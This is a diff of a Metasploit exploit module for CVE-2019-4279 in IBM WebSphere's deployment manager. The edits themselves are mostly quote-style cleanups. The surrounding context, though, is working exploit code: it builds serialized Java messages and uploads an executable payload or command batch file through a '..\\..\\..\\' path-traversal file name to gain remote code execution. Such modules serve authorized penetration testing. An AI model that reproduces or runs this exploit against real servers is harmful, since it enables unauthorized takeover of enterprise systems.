@@ -27,7 +27,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2019-4279'],
           ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
         ],
-        'Platform' => ['win'],
         'Targets' => [
           [
             'Windows Binary', {
@@ -80,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     # Connect to IBM Websphere Application Server
     connect
-    print_status("Connected to IBM WAS DMGR.")
+    print_status('Connected to IBM WAS DMGR.')
 
     node_port = datastore['RPORT']
 
@@ -98,14 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote
       command = datastore['CMD']
       payload_contents = command.to_s
       print_status('Executing command: ' + payload_contents)
-      bin_name << ".bat"
+      bin_name << '.bat'
     else
       payload_contents = generate_payload_exe(code: payload.generate)
-      bin_name << ".exe"
+      bin_name << '.exe'
     end
 
     print_status("Sending payload: #{bin_name}")
-    enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
+    enc_stream = construct_bcast_task_msg(node_port, '..\\..\\..\\' + bin_name, payload_contents, bin_name)
     send_msg(enc_stream)
     register_file_for_cleanup(bin_name)
   end
@@ -128,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Create the obj
     object = Rex::Java::Serialization::Model::NewObject.new
     object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
-    object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)
+    object.class_desc.description = build_tcp_node_msg(object, 12, '0.0.0.0', node_port, p2p_obj)
 
     # Create the stream and add the object
     stream = Rex::Java::Serialization::Model::Stream.new
@@ -141,13 +140,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
     # Add upload file argument
-    byte_arr = byte_str.unpack("C*")
+    byte_arr = byte_str.unpack('C*')
     upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd)
 
     # Create the obj
     object = Rex::Java::Serialization::Model::NewObject.new
     object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
-    object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj)
+    object.class_desc.description = build_bcast_run_task_msg(object, 41, '0.0.0.0', node_port, upfile_arg_obj)
 
     # Create the stream and add the object
     stream = Rex::Java::Serialization::Model::Stream.new
@@ -244,7 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote
     msg_class_desc.super_class.description = msg_obj
 
     # Construct IP Array
-    ip_arr = source_ip.split(".").map(&:to_i)
+    ip_arr = source_ip.split('.').map(&:to_i)
     builder = Rex::Java::Serialization::Builder.new
     values_array = builder.new_array(
       values_type: 'byte',
@@ -267,7 +266,7 @@ class MetasploitModule < Msf::Exploit::Remote
     msg_id = prng.rand(4294967295)
 
     # Create the field type for the origCell
-    field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
+    field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/lang/String;')
     msg_obj = build_message(obj, msg_id, msg_type, field_type)
 
     # Create the port field and add the reference
@@ -295,7 +294,7 @@ class MetasploitModule < Msf::Exploit::Remote
     node_prop_field = Rex::Java::Serialization::Model::Field.new
     node_prop_field.type = 'object'
     node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty')
-    node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;")
+    node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Lcom/ibm/son/mesh/AppLevelNodeProperty;')
 
     # Create the class description
     msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
@@ -318,7 +317,7 @@ class MetasploitModule < Msf::Exploit::Remote
     msg_class_desc.super_class.description = msg_obj
 
     # Construct IP Array
-    ip_arr = source_ip.split(".").map(&:to_i)
+    ip_arr = source_ip.split('.').map(&:to_i)
     builder = Rex::Java::Serialization::Builder.new
     values_array = builder.new_array(
       values_type: 'byte',
@@ -518,7 +517,7 @@ class MetasploitModule < Msf::Exploit::Remote
     byte_array = Rex::Java::Serialization::Model::NewArray.new
     byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
     byte_array.array_description.description = field_ref
-    byte_array.type = "byte"
+    byte_array.type = 'byte'
     byte_array.values = []
 
     # Set the member values
@@ -587,7 +586,7 @@ class MetasploitModule < Msf::Exploit::Remote
     byte_array = Rex::Java::Serialization::Model::NewArray.new
     byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
     byte_array.array_description.description = field_ref
-    byte_array.type = "byte"
+    byte_array.type = 'byte'
     byte_array.values = bytes
 
     # Set the member values
@@ -613,13 +612,13 @@ class MetasploitModule < Msf::Exploit::Remote
     task_field = Rex::Java::Serialization::Model::Field.new
     task_field.type = 'object'
     task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task')
-    task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
+    task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/lang/String;')
 
     # Create the task object field and add field_type
     task_arg_field = Rex::Java::Serialization::Model::Field.new
     task_arg_field.type = 'object'
     task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument')
-    task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;")
+    task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/io/Serializable;')
 
     # Create the integer field and add the reference
     forward_gather_field = Rex::Java::Serialization::Model::Field.new
